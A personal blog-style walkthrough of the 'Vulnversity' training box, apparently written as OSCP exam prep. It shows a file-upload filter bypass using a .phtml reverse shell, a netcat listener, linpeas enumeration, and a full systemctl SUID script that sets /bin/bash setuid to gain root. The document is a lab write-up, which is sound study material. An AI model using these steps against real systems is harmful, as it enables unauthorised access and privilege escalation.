OSCP Prep: Vulnversity without metasploit

Learn about active recon, web app attacks and privilege escalation.

With the nmap scan I see several ports open but 3333 sticks out the most for 2 reasons.

1 http normally runs on port 80 not 3333.

2 The name of the http title is vuln university which is the name of this box

So now I simply typed the IP address with the http port and discovered a website. 10.10.120.237:3333

From here I was able to use dirsearch to discover hidden directories

I discovered a hidden directory for /internal/

Which appears to be an upload page

From here I was able to download a PHP reverse shell and save it in a text editor

Went inside the file and modified the ip address to the vpn connection or tun0/tap0

My VPN Ip address is 10.6.34.136

You can leave the port the same

I attempted to upload the file but the php extension is blocked

Phtml extension is allowed on this server so I changed the extension name on the file

The file was successfully uploaded

From here I did another dirsearch and found an upload page. Once we submit the reverse shell to the file upload page on /internal/ we naviagte to /internal/uploads to get a shell ( activate the reverse shell)

here is the dirsearch finding of the reverse shell activation

I now have a shell on the machine. Once you create a listener for the port using nc -lnvp 1234

You can execute the payload by going to the following site 10.10.120.237:3333/internal/uploads/php-reverse-shell.phtml

Here I found the user flag

From here I hosted the linpeas.sh file on a server so I could download linpeas on the machine

Here we discover a SUID vulnerability

I slightly modified the script that was provided.

TF=$(mktemp).service

echo ‘[Service]

Type=oneshot

ExecStart=/bin/sh -c “chmod +s /bin/bash”

[Install]

WantedBy=multi-user.target’ > $TF

/bin/systemctl link $TF

/bin/systemctl enable — now $TF

From here I was able to copy and paste the whole script for the systemcl suid and gain root

eJPT | Sec+ | Cyber Security Enthusiast. I plan on obtaining the ecpptv2 and OSCP in 2021. Just documenting my experience of becoming a pentester along the way.